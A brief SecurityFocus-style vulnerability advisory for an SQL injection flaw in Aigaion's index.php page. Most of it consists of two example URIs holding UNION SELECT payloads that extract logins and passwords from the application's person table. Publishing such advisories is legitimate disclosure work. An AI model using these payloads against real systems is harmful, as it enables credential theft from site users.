Aigaion Index.PHP SQL Injection Vulnerability

No exploit is required.

Example URIs have been provided:

http://www.example.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1--
http://www.example.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--


 

Privacy Statement
Copyright 2010, SecurityFocus